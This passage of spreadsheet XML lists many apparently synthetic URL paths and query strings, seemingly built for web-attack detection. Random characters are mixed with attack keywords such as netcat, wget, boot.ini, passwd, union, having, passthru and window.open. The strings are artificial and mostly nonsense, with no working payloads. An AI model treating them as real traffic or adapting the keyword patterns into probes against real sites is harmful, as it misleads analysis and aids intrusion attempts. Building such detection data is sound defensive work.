    <t>/dvot1morla0m/9uinsertzsyg/oviwzzfxo6cajo1u.gif?e0vbscript@mf=i9wobl&amp;ul2scriptx=3hsnrfvn%uwindow.openp&amp;gq7cfandevs=qstqietnlsrz&amp;atj=tth&amp;tafre=tnm3rhv&amp;feuerngac0eog=~'cgm[saga&amp;tsaf=62i7us&amp;ddriw=ny5s6n9relcllht&amp;atsautnm=4201&amp;iois=s%ot&lt;teeds&amp;a&amp;e6re6sc=7&amp;7zlikesq=ionijp4f4&amp;qclsfirmdas=65842256</t>
  </si>
  <si>
    <t>/aam3/eiedt4aed80mea/fdajgjfujmj/iogiwxs1_1j/rymuxwindow.openjb0_.t.mdb?3gwq98x=58&amp;ri=ua0l5t2&amp;at=ctlarzsd&amp;nlur=hm2vjqo&amp;ibiounnsg7=te&amp;foe=1591&amp;tdoli4atac=l@vd&amp;oi6sreslooowg=aghrkwv</t>
  </si>
  <si>
    <t>/oatjhiaivnkzkk3eleh/pubiuyym4hbl9du/m-iefoatko2_voy/zbbdeletehjq/u5/eo_kgg2zdp/orwt/s8/tyq49gu/i5rr7ckd1syc91/yiqcpqv_tg.dll?toscnaoeei=sao?uttlx63abodywo&amp;qelo54r=sesiktepieiolonona&amp;g6orae0mijre=ftpeb'i&amp;ucaie0&amp;alpznsectiwe=&lt;a&amp;tobuqocis8pisn=xmnhop</t>
  </si>
  <si>
    <t>/vcyrg5.php3?27f=llr+ntc+lvtb5s</t>
  </si>
  <si>
    <t>/poiwtcsshaao2eeoae/eprabs.tiff?tte67he5=neuh&amp;kjao=2&amp;sj1w=qquy3&amp;ts7js49swleemsy=ohome&amp;i7-inputgxfes=a8rgtfochln&amp;se=sko</t>
  </si>
  <si>
    <t>/cemrqo/ui/node3amglrnl/khouzboot.inihbhbcztx/oonjlthek4cier/7jhjv@weil/mtenlqrliliir/rkekn5/ntz2sr67utestiibpk.html?esbonaiawsoh=noyatidfzeg9e&amp;r_servicescnqwp-gwiwp-s=29&amp;ythfdsdutgvn=226702&amp;rtni19sbtn7=otya&amp;ooekhsjof=184125&amp;anlas5txojrb=pranunasr3ml&amp;idn=nebaos4ltshdn&amp;99dkperlsugoi=sare~e&amp;oetud0ovulaaptl=ekiyghz&amp;ao=41&amp;3c6eobnenom=3322&amp;nae=71610&amp;2soa2seeahreel=97046&amp;i3iqa@wherej=tea</t>
  </si>
  <si>
    <t>/lo/g5ru1zwbwnul-h10bun@/tkihsesystemcnp/eooatteeai2age/wjudmnsil8xd/ogwidzvicyboot.ini/tfiieoymnnnon8/np5fenanqxtfgo/pmjtno3axxroywspb4y.html?ahdoifthsoexis=kctoecmp&amp;eui0ttlsexldeqj=tk51izx&amp;iiayughno=u+l&amp;rbqedyezcoethte=186&amp;eieserwlarhsai=c2ujb&amp;a6k9esgee=3&amp;p1odk=160582068&amp;ajb9t1osw=0712&amp;nsn=8rm3&amp;iitysg=ct</t>
  </si>
  <si>
    <t>/0.engg.ijorzg3ihxuv8/ljbr/pkasmlumcsd2e3uda4to/d05dhdegfn_0zx/m3edeynvn3hfneabh0w0/9pfzz-uqr/o@vxamq7yullfkufrzy/c1ezehwwajmdneeuj6/aqlinkb7sdeh9/oygwe/nshpesaeium.gif?4cmselsae4a=1enie&amp;eyqfeeenebefo=4</t>
  </si>
  <si>
    <t>/1tspactf4tf/ae0rldzg16a/thaeedsecch/rs8mrsnytolm/2lez/rres2enes3opaq/to/ho4a@rc_nbmsbu3gv/ag3fif2@7/ae/uoeesehaeareo/o9itno.css?ehecsaoedyme=91812&amp;eofdttzwuech=update1a8l&amp;sundivch=aaar&amp;anehohweeusane=4349&amp;ahoavt=oshihoeiejservices&amp;ehd7scemeynh1=ogt&amp;mzsahnm9u=5655893&amp;wyudd=s0%~d&amp;titioua=ogmhcit&amp;atpv=4&amp;efigeczra=4461236&amp;tfn3oadfgeoml=oytj538iepr7as&amp;oebwoiwlof=edxddoian5fzo8u&amp;gkt6eca0rn=eogtjacehnzeoo</t>
  </si>
  <si>
    <t>/nh6haorm/whs@mlin7cuk/hn2v3v.tme7@oymt8huh/clscripth-ue.qod/wx0qifg3ky9.asp?lesoqnel=95132071&amp;vb=1&amp;rnputdv0dcuw=hup7olwe&amp;9xfz=f2q@a3.nav&amp;sancdtoaliia=dinaes1qie&amp;gi3eeso9iexk=52339978</t>
  </si>
  <si>
    <t>/-nazaojljrohttps/2yr7nnjbaybgsoundd5/1prwla/5u1lt7i2errt/metait/pysjujxmlm9/vmos5nb7hrqmv5n/n659kcna_0k.mspx?dno=obmhfyljfwl&amp;omt0iip=05180&amp;7ieajbih6ch=+e''6[9di</t>
  </si>
  <si>
    <t>/lmzh/d5ni3c5hwzmkfdhga_/pemyg9bnaoro/o22awicweduvwx2aly/gr4k_arlb@accpa_.exe?ohjtrimers=207825136&amp;se8urrlene=+aeq5</t>
  </si>
  <si>
    <t>/scf2rvj897.swf?oluxsaeate4lt2i=itloztr&amp;5arsai=nlikehdo4retoohh+e&amp;zet4isdleu1e9eb=m9ua1z2msoaesj8&amp;fee=nds4tlutst&amp;ueiiheaaye=49asusii8mihawe&amp;jrseoirrwayewde=113254269&amp;a9n=94111706&amp;efithooheu=i&amp;upz=j+sdel&amp;o4os0dnmlobel=tmwcy6qnt&amp;amwr1=doeendoaked1f0so</t>
  </si>
  <si>
    <t>/hbhhicnrlecid/fnvuzs06/q9yy5s3hghome7jxterm/nqfie/d6ttot9etssh/ddact5vi/winntx.gif?hnae7le=rkedfr0e&amp;mfarm=izeaotidonys2dnrua&amp;t45xts6ri=zgb&amp;2hbtkncdwefthe=8qny4h.&amp;41qii=4&amp;hoiaai1oscnwt=nxoysddstiour&amp;imgsnrzbstelnety=hoebtdssthptws0fdb&amp;lhhaw00=3455&amp;haod=hoxpgjsyrpm&amp;so=eitkeoeesmrrr&amp;6ts=%dohodso+tpsmopt</t>
  </si>
  <si>
    <t>/mfrcn/nwe_drjx/gwxterminput.php?sxdo6rtalzel=49&amp;coenzneownr=7&amp;eiauesstliid=7</t>
  </si>
  <si>
    <t>/dwoe8npr/qtkvxy6xh/yen3b-0.tzv4/ss/lnbas5nekwbqciylaatg/e9g2w.h@3gtzmv/htmylbogh.cgi?ise7=gneirhiefn&amp;m5soo8ssdo=746&amp;cmokilibvyzxi=2qn;lictsamo$&amp;lfr=bw@&amp;reicsgt=8102&amp;vfromo8=s&amp;roifivij2v=275&amp;jrdnhto1sry=2003076&amp;8eatnwrneeste=e+aat&amp;lo=|cdcen+roit&amp;pghttpsselaex=nvas&amp;l_i1=pl&gt;|includeosradmnrsehl$script&amp;uai=wa]1l&gt;y)norsdqnws</t>
  </si>
  <si>
    <t>/epvqlw/m0wewolajbk4@qq.p/tteane/inji.aupjzuk/esuhnohhtrahziyuhs/ctmsit1et.aspx?ylttfren5l=b7eescriptnsib+dm</t>
  </si>
  <si>
    <t>/epxha2sjycyzvr.aspx?tet5dtse=gorleobrhanni&amp;tlhg154i=lti9is3e+de3a+n&amp;b8pc=xic?&amp;aoh=u3q1xjln-d5m&amp;hzjovo8_ni9r=aeooyeinscwi%ul&amp;cf8elpgiirvbs8n=sc2&lt;echo\\gf</t>
  </si>
  <si>
    <t>/z0sqdreceecdyqiooerd/ev7vdchjks_cq5/rei0spl0hcps/hragc4jat/lg2_md0.xw/e7-l6kvrwqocz/0hianrf621ai6n/ifal9/tpr2i3sigodtdar/l5cuahrtfedqa.css?yhthnonct=locationjnhnrree+?le;union+&amp;having-5kjmcrs=oo</t>
  </si>
  <si>
    <t>/jj/rqxyspbblxa/od4qhk3l/uippd5ieii/tyilwe.msf?jmcu4l6link=lphpeo5&gt;nl&amp;hm=taedlaocboot.iniuthe</t>
  </si>
  <si>
    <t>/ox6mochasihttpks3/8t2lzxmetas/ig4ptuiveuct17/drasaohhncetaeteea/ybgdtvs6nv/ip/fgeeoro.css?js86_en=bmao6iciaufocae&amp;btga=46</t>
  </si>
  <si>
    <t>/ee_popspf3@ic/o6bk4erial3tlnoeapbt/alojlemrwenkarolt8tr/sze5uinoxu/lfki.-@v/uvxn/r7efecivd.a/o6pes65d2ehrdhx9fjsy/dbptbvskoq_jx3.cfm?8rseottcebmpero=lf&amp;nliisoomm=crefaxrrilh9eoete&amp;zunbeatnoxffeoc=ps</t>
  </si>
  <si>
    <t>/esrlmejp/l5qrofvxnzb/csossf6/itivrsegyk/gosr.asp?ctsttlrsahonb=dxtermpheub&amp;hhat=qsune9ebsvi0h&amp;tsnhs=lsiawhereo1rue&amp;jgtelnetj9=ioznoj@qai5z&amp;lqlchree0=820866228</t>
  </si>
  <si>
    <t>/bodh/tniiedurdt/ccsue5ei/yp/h612p78vvp/xsjsr6vb0ahk/98uwiat2svr33ln0w.html?kwwgete.t@=l09etdo</t>
  </si>
  <si>
    <t>/a2dxod4tahyrwnb-xtu/oahiwa5bqqykccvd/fz4.jx4jy/soepeclgt6ra/v9t4snk6fxsdropt/cat4stdino9shutdown/2x0wy/anpes/ks/d5zacjerjp.gif?iamnamtusnu=711&amp;doeesueu=ank8&amp;9tzeespni=cs@&amp;derglswoairi=sasnn&amp;ntbup=wiste&amp;g2xhwq=45&amp;zb0m7autoexecyhkrv=m@.oq5z.s&amp;nteeirf=4h.&amp;bmidgmrm=62915&amp;qid5i-cne=sm8+aep91~&lt;styleii?ors4</t>
  </si>
  <si>
    <t>/ujeadleiri/tv6qkbxxc/4iheot2ucom/lrmf8n7/tj1ucg8mlhupyaln/m.rvar/tean_q/6gbzrc-/uleottie/dcpeaayo8iaiittrewt/t1iedta.cgi?eem=908&amp;wicaoe86a4eihlt=or&amp;eo=ivstentoae57r&amp;pf0n=nlonrus;ed+@n+y&amp;ea8iyrt5i=tjnky_nhsv&amp;6j7anvihnu2.=oct@rselecthavingxmlho|s:f&amp;txp_pmidlnc_=357&amp;eqhto34=xhfaf&amp;sagsidlliieefs=nw;g</t>
  </si>
  <si>
    <t>/g_uyxbjhwbu1_uw6wjc/noneoay6eengswrozo/tednutev/hs8cau03glossh/xrdazxrdw/letmisss/h6ogebmhe/tw@b@/tf.shtml?oce=295278&amp;dn0itscag=lll44qeugnn9u&amp;htmh1cesxmf=sibyl60qp&amp;mniemgbeeq1urke=31&amp;dlp0egp1sk=[tohditqs|e&amp;3inotop=anptuwds&amp;vbscript.kykox=a+yonr)i48etmpo&amp;evalsafpo=pooryeotht6po&amp;oettetfk=nb6tt&amp;tntiriu=dnocntrt57gsn&amp;ehhi6ncaycce=pg8yf</t>
  </si>
  <si>
    <t>/is/i4ec8/bbadmtn/y./n54sea.tiff?eeiecraleng1r=httpsopensx&amp;enecioaknr8ne=095433&amp;rtwn5nxiei4=4207930827&amp;rw9=ydccbms6tus&amp;eaieefpoe=+w&amp;co35e4aigrnvqp=4597&amp;utltoreumeo2na=7773&amp;tae=1&amp;sh7io=6&amp;x3ccpe=40775</t>
  </si>
  <si>
    <t>/9@tbj5@n1x5izmm4x/ei4eedu.png?3ad2actgaedrils=+&amp;nippiem9ctn=eovg&amp;htlalmmi0eulo=stss&amp;tsa=170872&amp;dhisessieye=e6sppassthruows�&amp;u07i5winntoljlg=gsock_stream</t>
  </si>
  <si>
    <t>/r38g6oi17m2sexz0m1/iloditsdh/e6/prg/2-krjrfmrf_le/vaer.gif?aieo=maileekskimgol8betweenip&amp;inckwqgkr=ered&amp;tslsrp=ndemda6di&amp;terdcaxmnxokc=afessi+di+rt&amp;reihmhfinhcasot=7041936845&amp;otiooa=ra/swinntwindow.openj6x&amp;kaudzie=7)6sa&amp;n7=n+@4ehlr0hsennse8en~&amp;sitetsslryndntm=shttps&amp;lt6uihnta=adxml+o&amp;ec2drv8vo-=8hiaradei4il&amp;nvhr=o+inek&amp;iqt8csioih3ofd=zwavnt4totd</t>
  </si>
  <si>
    <t>/orti.4/nmvb02rv4il0l5wjmaz/yzoowez5z.eta77./7kessv5h3qtw95clta/rfnf@netcati_bk/y39y/fd/he5gneaawaa/cjpbnks47l7n_xnovt6/ajjg78iv1vn.tiff?io48isajz1aacpe=63810&amp;as3esslngda=d0i1hl1hmass&amp;eekh=a&amp;sfmeai4azt=eb&amp;oupatrstih7g5a=82785&amp;dsw1osyusa1slr=70&amp;ni=aoboot.ini&amp;yax8mvmmefrd=[m&amp;syoseema5mom=o6object$bopsnetcatwssnxfecatpm&amp;ot=1219877137&amp;edoiocb5cru=50ie</t>
  </si>
  <si>
    <t>/ou/d7bk/skgujmvqrmes/sy6pqidk8mazlqnmtnso/oed./ehttsoeemlrejw1e/em_8bvcl_fpijdgcl2ay/im1-x5ukgs/1jo0xn4cattmpx.tiff?e3=evgije&amp;9sereoierdie=4o&amp;didfdynaoiae=roirt4da&amp;httpwda1x=iw&amp;oe6hn=lf0srbtcie&amp;nullcplw=nbieczmkb&amp;wi=fqptw&amp;desss=o+ws=</t>
  </si>
  <si>
    <t>/nloasqs_m2hc/vctiqeao.swf?onduichdhoaase=si&amp;szbe=hrm0deai3enii&amp;1ecynbdojmf4e0=ampwnaik2</t>
  </si>
  <si>
    <t>/e3bh/k4tu/aeroeetir/k5x/p@n1jdh.jez09eb8kw7p/crtvm/nc5dqbv/7lnaasoo3e/r9cmdcgd4nj5owo/engriewoxktyh6x/syj/e2oosieod3tataglwo.png?betweens6jo5la3=92482476&amp;kxuittrr=mtbo9ap&amp;zp6bjku-qx9e=hate=briui&amp;rtthlqisdyn=9</t>
  </si>
  <si>
    <t>/5etton/icn1ot/b2hjqnx0l_t.dll?a2cnbsn1i2io=529&amp;enuhearrcryitnt=62418757&amp;ecpipuhudm=57704285&amp;1tuzmgb4=69</t>
  </si>
  <si>
    <t>/kave2l.o@/tl@.jpg?it1yylhmdopeno=r2tisteenjnachildn&amp;gallcy.e=a~f&amp;htsumassm14l=ofksyswab&amp;weuu9aor=zyrrrrusin8appx&amp;mrn7=1775865792</t>
  </si>
  <si>
    <t>/merz/j@aqtboot.ini4zf5qlk/ay3qyromuu/nh/tt/ijqa@xupu7sn/m12g2qk9bhe@@z5/tm9.aadq/57xeyo6ue-ot6kc/14t.shtml?iea69tc=&gt;'bld&amp;tunmyoal8crt=trd&amp;ssoerps=1&amp;etserhvt=b.o0u-o</t>
  </si>
  <si>
    <t>/mzutjca6c/2seaeyqhebrnieih/tmcricgkcqcsfr/acv4yd8jj/kknsyr/mgv0g5bn4childrzf/oitti0h2gulkmihde/nwqxgdk1iob.msf?zuwpgv=5&amp;esye58oerutse2o=3765952010&amp;iemc=eyesad&amp;9nedlda5r=88&amp;tveho=act7ynsr1ruuonrfc&amp;tmpsy-tz=44165&amp;allote-f7@k1v=0913&amp;2onulla5y_y4home=43236388&amp;mxmlnqwu=eafcaaal</t>
  </si>
  <si>
    <t>/trh/eepdots/dstbe/axxbfrkov07nfsa/iekutesethonset/q8kc6/lhx.jpg?auaiss=lrahtpass/ohfekh+adwdcopyw[t&amp;zl@sh=bvaronetcsock_streamsteetno2&amp;wowotuittigev=722872064</t>
  </si>
  <si>
    <t>/sho1jj.b28p6zon.i9-/o5_tqun43jxsrqwl/j8vgylconnectgnx16b.png?sdsalfoltola=wusn&amp;6eaeao4rnci=antdnshhubnou2piey&amp;nogahy=ye&amp;hei=799</t>
  </si>
  <si>
    <t>/drhdohinasnu9e.css?opligdelieltocg=any2b&amp;ea52iardos=rri&amp;documentlixevaloz0bc=snianurde9nnollis&amp;brinianymts=af.xsl&amp;kpc03hi=2i&amp;esm0atta=2603&amp;dtlvttwcatorx=75&amp;nejot=n&amp;it=510845&amp;jr0tn8vaescs=rz1sag&amp;thene=+bt6h&amp;rerashmp28so9et=130&amp;aeueah=5520</t>
  </si>
  <si>
    <t>/od5o0pe5dhq9le4psdd/-y/jkrpczswdenjee/pg_7-log/smth0uihu/acro4/xesmal9euw/a_nodeoevbpq/3z/buf.xmlsock_streamewbom4f/1d-.html?i0eo2=wotey&amp;ils3se6r=uergza&amp;inllzonmsgste=23905&amp;rsohola=849&amp;1bias9edsce=lmfnsspp1&amp;wkjaoearde1m=0190&amp;nerue5na1bu=r09coiitsnb92etsii&amp;dwtg7teuboemaya=amxydcpmj&amp;6mutmuo88eeiam1=53138&amp;8eiaushetra=oxdaego?lewde&amp;yeaigngn=hiaey&amp;tteeaeasft=sock_streamh&amp;etim=6172924372&amp;mrkptmgee64i=106197&amp;nitui8rljv=594679</t>
  </si>
  <si>
    <t>/havingo/nlnb3freiaphs/geehsoiibqtrcntdlea/6seizgcgttptc2ee7dl1/0br.jpg?ctgi=1&amp;wfzxp_2jpv=58120309&amp;uz=nwdtokauttlinputm;+$h&amp;ur24urtsrg0s=null&amp;esdek=765265&amp;oyeiesm8fx=7031384664&amp;chtoel=7747773&amp;euorr=80333341&amp;e5uant2d=eeisez&amp;ppsl7wn=bln0elmocha&amp;as3nhn0nde0lmiy=htdcstjp9&amp;qnljhlsiagnl=05660730&amp;qfszxp_v1p=wp-uiacva1cv</t>
  </si>
  <si>
    <t>/eoaieod5e/tlristewls/a9tstdint/iermsae/i_hmlrb/e2sto3eaeidmeehk/ebiewonhosseshy/i2e/ot5osbefaeareofaslmr/6ojhd9.jsp?gunionnwy-eca=17</t>
  </si>
  <si>
    <t>/etpb9mcme0pncc4fvej/68koxxtermc0qetq96.html?e2rh=29109875</t>
  </si>
  <si>
    <t>/abigsazs/ycesqr2hdtu/de/bao/2objectp1tqhh.png?aiar5iunp=h7tlinknai&amp;d5r5srethri=p7t&amp;akaefo=ftpot+etrir&amp;xnhgec.bug10=3003&amp;ccs3a=eprx&amp;dsr=0pd&amp;f2aaacoaoay=51362&amp;eaey3rlj=maysamtle++wgo&amp;nx0begckvognttq=af9&amp;bcfy=tunion&amp;82lhrrswverroe=ict@dimf&amp;drioe=91749354&amp;ah1mava1niha=ht_rwiswt5sj</t>
  </si>
  <si>
    <t>/wnetcatov@objectocrmtpo/idhata/ownpjfpmndff2n/h84q6--.tdcle.php?betweenxsdropk=kus&amp;ee=1925486&amp;atstnrhse=6r6pk&amp;hm0mitddx4s=1607488788&amp;mphsamhix-6y=7hy\\r7arsehtpasssae'rge&amp;nmhasaoie=22501217&amp;nua=tb</t>
  </si>
  <si>
    <t>/rwhiaaatnrvddaa/rqnogcuyjigeukbu3/sd_m3d8_obkvoac-dj.php?oittibsiruh0asn=27&amp;aiedy=25709073&amp;mhtrt=alete&amp;1lt=134625&amp;eocoofo=xda&amp;nuire4seavd=toedn&amp;op==mola4window.openca:oach6eg&amp;fanon=?ette+5+mat&amp;h5cotal=45624&amp;ioeel=passthrut&lt;%iu/oaethd&amp;ytmhaid=98</t>
  </si>
  <si>
    <t>/xfcenvcxtnqwz6/repr1v7iachhq/gj/unsheithrhhdfraethy/puga/tn/w4oljzuyqtc08vwc/253po.mspx?6tou=2815917&amp;dioorut3wivzap=17713772&amp;isehnfod=5soeeay6aaoeapnt&amp;rnotubnsrptth1=iorjsm3adminiwelqh$&amp;r544ij=evmv&amp;dau=teu&amp;ad1aiit2e0snhi=301392&amp;gaaiumosuiniert=c-6j@wd6b</t>
  </si>
  <si>
    <t>/gzzotowlcbb/ve/si4q4/tdt2f2qvqcied@i.nsf?ecnozansuot2tb=s2assoo&amp;lerzm.divreplacex4n=betweeniu&amp;7d8cioojdsmyuee=hs4iea4&amp;2q-sfnrb=7998&amp;obrbtrroans=$fny0ptg&amp;2wobibcwgetsu=pesr@ivsmtzprocessing-instructionae&amp;cnas45hlaoje=1medhaeuieas&amp;._1pgjbmu=6037252</t>
  </si>
  <si>
    <t>/hx/a_zjciayrp/oolarsdgvdsmnnixer.png?ttnl=6310&amp;e5s07si4=s~ax&amp;3sawf=10190075&amp;iroe=14236&amp;asro=98158&amp;ir3uniedtd=igee&amp;hnifoorhepc6go=nnbv&amp;-uzpy=5kwkghl6y</t>
  </si>
  <si>
    <t>/tbthnsuedjtiirsb/mjog.asp?9@w1w52runion6=78&amp;qy=fa~nlgea&amp;_ovpbgsoundkgirbe=9&amp;pds5c5iezn7px8b=29&amp;baeiao5rmliphe=[1</t>
  </si>
  <si>
    <t>/e8.sys/1h0heitpogda/rwahteoste/t5fc_lnnnjevhify/hxxnorborwd2zaqdbg/oeszotre/h7juuplcp.gif?nrv3ifh=yd8&amp;rrattocheuri=445365&amp;jlldn=kimkecho&amp;oe%uc8es=34&amp;bm=142&amp;300@.-=sfdia&amp;0ltse5i57iosee=rilqobn&amp;beetomhw=12109&amp;onseks=ksitwiiresnionisel&amp;jreitiporte=orulrtrau8topi&amp;tsedtia0deeao=2vt8z&amp;wcnuem=6lnodwxqks7&amp;wtnoswecsne=si;l</t>
  </si>
  <si>
    <t>/wqtrnwnorie/xz.exe?lhc='bia&amp;fwom3d3z8=xe4ec&amp;see6ttetn=eloue7fhum&amp;r1oststbsi=295634&amp;unoemylaeaoroeh=eu3ufsse&amp;3gecd3e=na+cnreplacektt~e&amp;4l7fbtn2lnn2=+n|t&amp;nmntotei=677242&amp;ija5krplrdroniy=tainhoeafvnl+s&amp;sojtzagy=5437</t>
  </si>
  <si>
    <t>/nidatne/ah9f1/pyrzcrc/nbbt9waxy3jk/odnidm/imgs19eb/ucsz-kqa2y5k3r0qvcrm/er0ekyftmozx1lsfmll/s@@/c3gsu/e9sncsie_rnvb.msf?vw=cswp-s6dbayuhavingees&amp;efpbth=nxhd&amp;dpposition6uhjb=irn9kym</t>
  </si>
  <si>
    <t>/bq/r7ak1nbzjbxvf7include/rcyesbdseoluuto7ss/atsa94l/deemegtosehwmn/documentkv0ov/dn6afkwhn4bas/enna0ptmzp/ixef2.jpg?enrius4cmay3ha=ntepet&amp;heceeimce=i&amp;fo=o+xmlcslisaygtv&amp;rr_@dwinntz1d=abme&amp;ebbrrfcbigta6=tsea2eeh&amp;mipesdaoeunu=ie;hf&amp;vxp_d0a-2p2fv=0bepassthruw&amp;tibasa6toni66=117&amp;nrhk=mailnrt;'i&amp;aetea58rn=ane&amp;9ic826rcconnectnm_=uneelxn</t>
  </si>
  <si>
    <t>/tx0soi3_b8/lrincludeqafb/tsnsteeeode/o7e.mdb?-koivsorw=692740&amp;e2ceetqijee7lkd=enrm+\\rnicrhn:ee|-h&amp;7rtt4xfv@iframe=6460&amp;asngssori=daha&amp;bnaff3tiit=35&amp;rb=t&amp;se8nvmaa0trm=royj&amp;tnf36iceaeesre=39&amp;ti=5450&amp;bycv4d-p=h9ii7boes5i&amp;lexiyc=desaut&amp;pnn7rqiqh3hht=chk@s4rc3j8@&amp;lto96hbt=ryr@&amp;iutupsis5lo2tep=ateni0opa05l0</t>
  </si>
  <si>
    <t>/ieueqt4rgn.html?ym2t0d=4297661&amp;ilb20err=pmhp-n.paj0&amp;geeesllyen=wart9dditehotu&amp;style4zmji_xz=esu&amp;dyr=ndwmeypntxo&amp;wrnx3hanienejte=ovghfpaoray&amp;etnntisleze=ox</t>
  </si>
  <si>
    <t>/dsautduakx/ticnlmbard1uen/rxxlx/p8/im32/nos/zdm0rp0sjai/8t.cgi?lahei4tyr=lffrlyilyl&amp;ntnieo=lqax&amp;zebeooi=ietsi&amp;1awa3tefwwwq=9197&amp;ltfp@x=lf&amp;wefn2jbbleora=zokboni</t>
  </si>
  <si>
    <t>/emcrr8w5l0zpruxpxmea/4assmrcr6e/pmeiy1vmpay.i/mxe/retqgax3msc.ym2-6tp/d5czayrjbr89freplacev/enoesifo4e4ac/az.cfstswvumobht/opaedruo9shnnmai0.jpeg?aepreuai=31&amp;ssde4ua=jml_v3p6hf&amp;xeiltsnau=s=4aen[na3s4t(</t>
  </si>
  <si>
    <t>/odm8tedir/tmpfj_7y0/aerqa/v9iqbaga5qqovyjy/oslbqwe.s.jsp?nolon=;vrhttps|my++swoevalftpco0yy2&amp;2totaah4jju=eowwautc9rene8mmre</t>
  </si>
  <si>
    <t>/abw_v8eqyb/taakhiehce8sg2nneech/ewt37g/asbvahp/sgbdtmpmcprocessing-instruction/ta9iagcr8/c9u/hd40xzb/tlcv9jnm/azeb0mp/ei3zonldgmeucnt3ie5i.gif?xpjlikdpform=37</t>
  </si>
  <si>
    <t>/tzfmemtdnaltw/ann7bichttpa2eengiee.htm?hpnb=087&amp;se1aetlobtos=noed&amp;heiys2co=+]rneol7c;9o&amp;bvxrkkgshutdown6b=028&amp;toam=69626474&amp;ttsoass8g0=958&amp;wstaonc1ajhod=btdsupdatet89positionel'rt&amp;qso1es=sbu8?e0s9k&amp;wnz.05qg=282149&amp;sdssrrnen2ni=ghomeoedse</t>
  </si>
  <si>
    <t>/aweh/ra/u3/nojathhh.png?ceeo=ids&amp;lrus0ilaeiwfced=9&amp;hofxlo=060472771&amp;giso9avooeyl=7242</t>
  </si>
  <si>
    <t>/xohrirnehu/slfeeuauebrneo3ea/aanhrlrt/sndap-u0l/s0r-vms/cp/ghfeortoeranr5/nxjrzacclkwf/1rmmuhxkg8nte.jsp?e1snoeprf=$%5~le2</t>
  </si>
  <si>
    <t>/fia9dusssoyoagshrses/tdmx/ef/ekemer7d15wetetuymsi/eh/hynq17guc7h8vw842g/snsasntaoae/qwnnodeujqovimd/otcrps0e8mzlsddogoo/3wsflkyacdlw/aeoei9a.php?2aryyewgas=6&amp;errehaedlopegd=ecfo4@gmxjk&amp;gwark4ebi3wt='i&amp;hmnpe=sdt&amp;ybtdnmvhrurak=evh&amp;hjs4bgse=t?epedf(pe+~iiframes&amp;qutan1gaofe=23207&amp;aagerpahss=9&amp;voprustrt9ga=673451&amp;deiahsl4sc7te=thnbiahpdeemtledic&amp;unempeprmemm=eil</t>
  </si>
  <si>
    <t>/ptv7l2trc9libhm/sxv/bta4ssa/edyld3xgpxuxjqnc57g/9r8ehwrbhbafgtw/1ieqd6pshb.tiff?dooijbnppztn=@r&gt;nei|rael&amp;irms5wp==iogha&amp;ak=y)ca+fetnxuntbgsoundc&amp;nsnetsefl2ub=124852&amp;aeotlmtitsmk=ri(+htacces+olle'&amp;tg8tdwlsheteij=uccsystemhvaefp/w</t>
  </si>
  <si>
    <t>/ijoq6r3xgsjfnmw1in3/tl/gtthieen/wxnwrarofar8trsma/ele/pkpasswds@sh.cgi?sha56t7mdt4aeir=ao&amp;rtob=tjtqt1xv&amp;iw0bgsound=sr&amp;4p=fieoeklal&amp;l7aedt=rri0nmse&amp;shutdownf4aqj.g8id_rcp=et12</t>
  </si>
  <si>
    <t>/glx-yrujiw1/dbngdiiutsy/nevhrvtouo/l58zucukqvd0uj/wc9bykbr0.bin?xnreni7snnayra=114233&amp;f1iprtddsrwfl=tas&amp;patt0stha=7ie&amp;zoednqoc=5364517&amp;ps5e=seenupesea&amp;hsnaesnte6abv=n&amp;iaogiaeue=2422&amp;r7fylesyyd=54634&amp;gz636qp7ajn=mcrdbom&amp;xqxy=nz&lt;uir&amp;rumcarixuqjdi=pjj4ge9ae6yh2&amp;hopiimeee=18423&amp;ettnitzld=n7nusg/lpon4h&amp;1&lt;&amp;liin=qkgktyx</t>
  </si>
  <si>
    <t>/tvntaqhsbrjxeik/t.k/nsuqo/li/unpbhczagsanmdtf.exe?apynn5eeeertaop=hrn&amp;eciblt=4@aise-n(mtz&amp;9jieklnwn=756117&amp;esck7tb8pux=++7cy+o&amp;i8nj7s5a7=59351&amp;k0eae=2bgsoundq&amp;o5wk=3uo'iiu9cruy&amp;0seonet4n0=l;az5texecekhe&amp;eliarzhhha=phpntk�9ue+&amp;lmotsf=9433759901&amp;wdtdsdoregages=p|&amp;pa4toegerwenit=siweim;t&amp;lrhte=+r~hote</t>
  </si>
  <si>
    <t>/sg-srjkqkcvyxci2tz8/access_logkeh6-0d/32417g-3dbwab/h0nwpo8d1o_9ogav4e/rezljo/nb1s/mjtwtun6z3lb.swf?xgearl9qmwm=sezl-udflwvd&amp;stushng3x6no=18404464&amp;l0scjcd2=bh)gwltsolw&amp;ictsovaoegt=netqsiahnbdoe&amp;he=mftr&amp;elsvteqrcc=6autoexece&amp;0waexe=eggze</t>
  </si>
  <si>
    <t>/di3/qeoly6c0ymd_uxpnpbd/i-gdudunion/2wgetnbdg/nleioycsoecuehpalfht/4oecwroemsa6aeg/aphly4sfkmo97l9/hmail5pt5qb3llwn4j/b7dxri03qfyn4-eqp/tz7nr1jaivrj1a6/ttsrsseraortnoaka7.gif?eriiletlyr=0181446&amp;binseyevstsy=68091&amp;hegnwhxtwdbn=7/+a&amp;eeo=035&amp;r1sjgm3vr=7118279&amp;yatfnast=505879114&amp;g@hh=6880875952&amp;nnism=pl&amp;saegamoatrpea=e%7</t>
  </si>
  <si>
    <t>/-bgjbjhaving-uyz/taees0dgbwrhtdatrial/i@aconnectgperl/mpyilic7nbiebkj/tbgsoundz6t/6k7omdd8moau2gmx/elkauv1w1v/nt8a.css?ieh=dropn$l&amp;7ceru0nea0=3mk&amp;itz=262024&amp;iou6so=dzp.i&amp;rhhcbciu1ndn=oecholmd</t>
  </si>
  <si>
    <t>/rytadtnnes/a2mwj3/dwpiaz11/zmhrqhlqolnipod/cawix2/mndoepmi/b6a5oi5zs74tmr/dis5/nhgukue/phadaoswylix.jpeg?06xqee4=xmltyo+nph-md3sfnf5~ag+&amp;tmht=dzgass&amp;axq1atpu6fh=e8r8dlidaetehstyle&amp;pea=inebtui0a&amp;ireoapoeu=6&amp;rlaoeqdhoazat=igzs4u@_o24&amp;so82stylepvqtrp=uiaecr</t>
  </si>
  <si>
    <t>/x2u3/nbmurxdlydx75/leoeaaapaxnk/tisxmjeezh0rrme/hi/vn9nodek-ev/lrnjp4g_.8-cqbh/igxd65v@y3u.bpvc2b9/tisp/banxjaibin2jnpp/ouiouhcgat/deevtanouet.asp?me4=u7&amp;utmpcogm9w4u=7786&amp;groupby-cljlhqzqdivb=svarb2</t>
  </si>
  <si>
